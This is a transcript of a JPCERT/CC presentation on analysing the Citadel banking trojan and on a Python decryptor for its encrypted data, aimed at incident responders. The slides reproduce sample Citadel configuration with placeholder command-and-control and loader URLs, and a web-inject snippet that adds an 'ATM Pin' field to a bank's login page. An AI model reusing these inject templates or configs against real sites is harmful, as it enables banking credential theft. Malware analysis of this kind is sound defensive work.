fight against citadel in japan by you nakatsuru
Post on 19-Oct-2014
895 views
DESCRIPTION
Lately in Japan the malware Citadel has been implicated in multiple internet banking unauthorised transaction incidents. Citadel is a type of malware much like the Zeus known as banking trojans. When the malware successfully infects the users environment it utilises special functions called Web Injects to alter the website displayed in the end users computer to steal login credentials for internet banking sites. To handle Citadel infection incidents, it is necessary to clarify whatsettings and what servers the Citadel malware uses and communicates totherefore its essential to have an in-depth knowledge of Citadel and to conduct research on the files left by Citadel. In this presentation I will present my findings on doing detailed analysis on Citadel and introduce data transmission reconstruction and file reconstruction tools which have been created to handle Citadel incidents. You Nakatsuru You 'Tsuru' Nakatsuru, CISSP is a "just married" Information Security Analyst of Analysis Center at JPCERT/CC (Japan Computer Emergency Response Team Coordination Center) since April 2013. His primary responsibilities are to analyze malware abused in highly sophisticated cyber attacks, along with R&D on advanced counter malware technologies and cutting-edge incident handling methods. He also takes an active role in capacity building for junior malware analysts.TRANSCRIPT
![Page 1: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/1.jpg)
Fight AgainstCitadel in Japan
2014/02/18JPCERT/CC Analysis CenterNAKATSURU You
![Page 2: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/2.jpg)
Copyright©2014 JPCERT/CC All rights reserved.1
AgendaBackground—Unauthorized Remittance in Japan
Analyzing Citadel—Overview—Encryption
Making of Citadel DecryptorCitadel Decryptor—Usage—Demo
![Page 3: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/3.jpg)
Copyright©2014 JPCERT/CC All rights reserved.2
BACKGROUND
![Page 4: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/4.jpg)
Copyright©2014 JPCERT/CC All rights reserved.3
Illegal Transfer in Japan
$14million
$500k$3million
2011 2012 2013http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf
Targeting 32 Banks
![Page 5: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/5.jpg)
Copyright©2014 JPCERT/CC All rights reserved.4
Related with Malware
http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf
In most cases, passwords are retrieved and abused through defaced web pages
where malware request users to authenticate
![Page 6: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/6.jpg)
Copyright©2014 JPCERT/CC All rights reserved.5
Banking Trojan
ZeuS
Ice IX
Citadel
GameOver
SpyEye Carberp etc.
![Page 7: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/7.jpg)
Copyright©2014 JPCERT/CC All rights reserved.6
Why Citadel?
http://blog.trendmicro.com/trendlabs-security-intelligence/citadel-makes-a-comeback-targets-japan-users/
![Page 8: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/8.jpg)
Copyright©2014 JPCERT/CC All rights reserved.7
Banking Trojan Incident
Back ConnectServer
WebPanel
Attacker
User
InternetBanking
![Page 9: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/9.jpg)
Copyright©2014 JPCERT/CC All rights reserved.8
Web Injects
User
InternetBanking
![Page 10: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/10.jpg)
Copyright©2014 JPCERT/CC All rights reserved.9
Web Injects Demo
![Page 11: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/11.jpg)
Copyright©2014 JPCERT/CC All rights reserved.10
Builder & Web Panel
![Page 12: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/12.jpg)
Copyright©2014 JPCERT/CC All rights reserved.11
Underground Market
![Page 13: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/13.jpg)
Copyright©2014 JPCERT/CC All rights reserved.12
Our Incident Response
Back ConnectServer
WebPanel
Attacker
User
InternetBanking
Information Sharing
![Page 14: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/14.jpg)
Copyright©2014 JPCERT/CC All rights reserved.13
Information We Need
Back ConnectServer
WebPanel
Attacker
User
InternetBanking
Which site is targeted
Where
Where
How
Where
![Page 15: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/15.jpg)
Copyright©2014 JPCERT/CC All rights reserved.14
ANALYZING CITADEL
![Page 16: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/16.jpg)
Copyright©2014 JPCERT/CC All rights reserved.15
External Information
LeakedCitadel
Web panel
Builder
LeakedZeuS
Web panel
Builder
ZeuSsource
Web panelsource
Buildersource
Binary
Debug info
Blogs
Sophos
LEXSI
![Page 17: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/17.jpg)
Copyright©2014 JPCERT/CC All rights reserved.16
Analysis Method
•Retrieving information
Surface Analysis
•Monitoring tools, Sandbox and debugging
Runtime Analysis
•Reading source code, assembly code
Static Analysis
![Page 18: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/18.jpg)
Copyright©2014 JPCERT/CC All rights reserved.17
Static AnalysisDiffing with ZeuS
![Page 19: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/19.jpg)
Copyright©2014 JPCERT/CC All rights reserved.18
Citadel OverviewSending report
Current settings,etc.
Web Injects
![Page 20: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/20.jpg)
Copyright©2014 JPCERT/CC All rights reserved.19
Configuration Files
•Default settings•Encryption key, URL of DynamicConfig
•Encoded and hardcoded
Base Config
•Additional settings•HTTP Injection, etc…
•Downloaded from servers
Dynamic Config
![Page 21: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/21.jpg)
Copyright©2014 JPCERT/CC All rights reserved.20
botnet "CIT"timer_config 4 9timer_logs 3 6timer_stats 4 8timer_modules 1 4timer_autoupdate 8url_config1 "http://citadelhost/folder/file.php|file=config.dll"url_config2 "http://reserve-citadelhost/folder/file.php|file=config.dll"remove_certs 1disable_cookies 0encryption_key "key123"report_software 1enable_luhn10_get 0enable_luhn10_post 1disable_antivirus 0use_module_video 1antiemulation_enable 0disable_httpgrabber 0use_module_ffcookie 1
Base Config
Dynamic Config URL
Password to generate RC4 key
![Page 22: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/22.jpg)
Copyright©2014 JPCERT/CC All rights reserved.21
Dynamic Configurl_loader "http://citadelhost/folder/file.php|file=soft.exe"url_server "http://citadelhost/folder/gate.php"file_webinjects "injects.txt"url_webinjects "http://citadelhost/folder/file.php"
entry "AdvancedConfigs""http://reserve-host1/folder/file.php|file=config.bin""http://reserve-host2/folder/file.php|file=config.bin"
endentry "WebFilters"
"#*wellsfargo.com/*""@*payment.com/*""!http://*.com/*.jpg"
end
(snip)
set_url https://www.wellsfargo.com/ GPdata_before<div><strong><label for="userid">Username</ladata_enddata_inject<input type="text" accesskey="U" id="userid" na<DIV><STRONG><LABEL for=userid>ATM Pin</Lstyle="WIDTH: 147px" tabIndex="2" maxLength=<DIV><STRONG><label for="password">Passwo<input type="password" accesskey="P" id="pass<input type="hidden" name="screenid" value="SI<input type="submit" value="Go" name="btnSign<input type="hidden" id="u_p" name="u_p" value</form>data_end
![Page 23: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/23.jpg)
Copyright©2014 JPCERT/CC All rights reserved.22
Encryption
![Page 24: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/24.jpg)
Copyright©2014 JPCERT/CC All rights reserved.23
Encrypted Data
![Page 25: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/25.jpg)
Copyright©2014 JPCERT/CC All rights reserved.24
Encrypted Data
Packet
POST data(report file)
DynamicConfig
Additional modules
File
Report
Backup of additional modules
Registry
Current settings
Backup of Dynamic Config
![Page 26: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/26.jpg)
Copyright©2014 JPCERT/CC All rights reserved.25
Encryption Method
• AES encryption and XOR encoding
AES+
• RC4 encryption and XOR encoding
RC4+
• Encryption of RC4+ twice
RC4+ * 2
• AES+ encryption using random generated key when installd
Installed Data
![Page 27: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/27.jpg)
Copyright©2014 JPCERT/CC All rights reserved.26
In Case of Dynamic Config
BaseConfig
DynamicConfig
XOR
AES+
UCL
![Page 28: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/28.jpg)
Copyright©2014 JPCERT/CC All rights reserved.27
0x400 Bytes Overlay
PE file PE file
Install setting Installed data
Before install After install
XOR key
ID, Install paths,AES key,
StrageArray key, etc.
Padding Padding
![Page 29: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/29.jpg)
Copyright©2014 JPCERT/CC All rights reserved.28
Encryption Summary
Category Data Format Encryption
Packet
Report EncryptedBinStrage RC4+
Dynamic Config EncryptedBinStrage AES+
Additional modules Executable RC4+ * 2
FileReport file StrageArray Installed Data
Backup of modules StrageArray Installed Data
Registry Backup of DynamicConfig
EncryptedBinStrage Installed Data
![Page 30: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/30.jpg)
Copyright©2014 JPCERT/CC All rights reserved.29
MAKING OFCITADEL DECRYPTOR
![Page 31: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/31.jpg)
Copyright©2014 JPCERT/CC All rights reserved.30
Our GoalDecrypt data & retrieve information for incident response
![Page 32: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/32.jpg)
Copyright©2014 JPCERT/CC All rights reserved.31
Implementation
Python PyCrypto
pefile UCL
![Page 33: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/33.jpg)
Copyright©2014 JPCERT/CC All rights reserved.32
RC4+ Decryption
Get RC4 keystream
RC4
VisualDecrypt
![Page 34: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/34.jpg)
Copyright©2014 JPCERT/CC All rights reserved.33
RC4+ Implementation
def rc4_plus_decrypt(login_key, base_key, buf):S1 = base_key['state']S2 = map(ord, login_key)out = ""i = j = k = 0for c in buf:
i = (i + 1) & 0xFFj = (j + S1[i]) & 0xFFS1[i], S1[j] = S1[j], S1[i]out += chr((ord(c) ^ S1[(S1[i]+S1[j])&0xFF])
^ S2[k%len(S2)])k += 1
return out
![Page 35: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/35.jpg)
Copyright©2014 JPCERT/CC All rights reserved.34
Get AES key
AESDecrypt
VisualDecrypt
AES+ Decryption
![Page 36: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/36.jpg)
Copyright©2014 JPCERT/CC All rights reserved.35
AES+ Implementation
def unpack_aes_plus(login_key, base_key, xor_key, aes_key, data):
aes = AES.new(aes_key)tmp = aes.decrypt(data)
out = ""for i in range(len(tmp)):
out += chr(ord(tmp[i]) ^ord(xor_key[i%len(xor_key)]))
return out
![Page 37: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/37.jpg)
Copyright©2014 JPCERT/CC All rights reserved.36
Decryption Parameter
Base Config
RC4 key
InstalledData
StrageArraykey
Random AES key
Others
Salt
LoginKey
RC4 XOR key
![Page 38: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/38.jpg)
Copyright©2014 JPCERT/CC All rights reserved.37
Obtaining Parameter
re.compile(".*¥x56¥xBA(..)¥x00¥x00¥x52¥x68(....)¥x50¥xE8....¥x8B¥x0D.*", re.DOTALL)
![Page 39: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/39.jpg)
Copyright©2014 JPCERT/CC All rights reserved.38
UCL Decompress
http://www.oberhumer.com/opensource/ucl/
![Page 40: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/40.jpg)
Copyright©2014 JPCERT/CC All rights reserved.39
UCL Decompress using ctypes
def _ucl_decompress(self, data):ucl = cdll.LoadLibrary(UCL)compressed = c_buffer(data)decompressed = c_buffer(DECOMPRESS_MAX_SIZE)decompressed_size = c_int()result = ucl.ucl_nrv2b_decompress_le32(
pointer(compressed),c_int(len(compressed.raw)),pointer(decompressed),pointer(decompressed_size))
return decompressed.raw[:decompressed_size.value]
![Page 41: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/41.jpg)
Copyright©2014 JPCERT/CC All rights reserved.40
CITADEL DECRYPTOR
![Page 42: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/42.jpg)
Copyright©2014 JPCERT/CC All rights reserved.41
Environment
• Citadel Decryptor is only available for 32bit environment
Windows + 32bit Python
• For AES decryption• Windows binary
• http://www.voidspace.org.uk/python/modules.shtml#pycrypto
PyCrypto
• A Python module for parsing PE file format (Windows executable)• For parsing PE sections to get decryption params
pefile
![Page 43: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/43.jpg)
Copyright©2014 JPCERT/CC All rights reserved.42
Data Requirement
Encrypted data
Unpacked Citadel•RC4 key•XOR key for AES+•XOR key for RC4+ (LOGINKEY)•Salt for RC4+
Installed Citadel• Installed Data
•Random generated AES key•Random generated StrageArray key
![Page 44: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/44.jpg)
Copyright©2014 JPCERT/CC All rights reserved.43
citadel_decryptor.pyEncrypted data & unpacked module are always required
>citadel_decryptor.pyusage: citadel_decryptor.py [-h] [-n] [-a] [-d]
[-o OUT] [-D] [-l LOGIN][-k KEY] [-x XOR] [-s SALT][-i INSTALLED][-m MODE] [-v]DAT EXE
citadel_decryptor.py: error: too few arguments
>
![Page 45: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/45.jpg)
Copyright©2014 JPCERT/CC All rights reserved.44
Cheat SheetThe following options have to be specified as well as encrypted data and unpacked Citadel
Category Data Option
Packet
Report -m2
Dynamic Config -d
Additional modules -m3 -n
FileReport files -a -i [Installed Citadel]
Backup of modules -a -i [Installed Citadel]
Registry Backup of Dynamic Config -d -i [Installed Citadel]
![Page 46: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/46.jpg)
Copyright©2014 JPCERT/CC All rights reserved.45
Demo
![Page 47: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/47.jpg)
Copyright©2014 JPCERT/CC All rights reserved.46
Tips
Convert registry data to binary• Export data using regedit & convert them to binary
using the following FileInsight plugin• https://github.com/nmantani/FileInsight-plugins
Unpacking• It is easy to break on APIs
• WriteProcessMemory• CreateProcessW• VirtualFree / VirtualFreeEx / RtlFreeHeap
• Dump executable (not after allocated) from virtual memory• including 0x400 bytes overlay
![Page 48: Fight Against Citadel in Japan by You Nakatsuru](https://reader034.vdocument.in/reader034/viewer/2022051012/5444a06db1af9f6c0a8b49b7/html5/thumbnails/48.jpg)
Copyright©2014 JPCERT/CC All rights reserved.47
Future Tasks
We already have•ZeuS Decryptor
•Ver 2.0.8.9•Ver 2.9.6.1
• Ice IX Decryptor•etc.
We want•Gameover (P2P ZeuS) Decryptor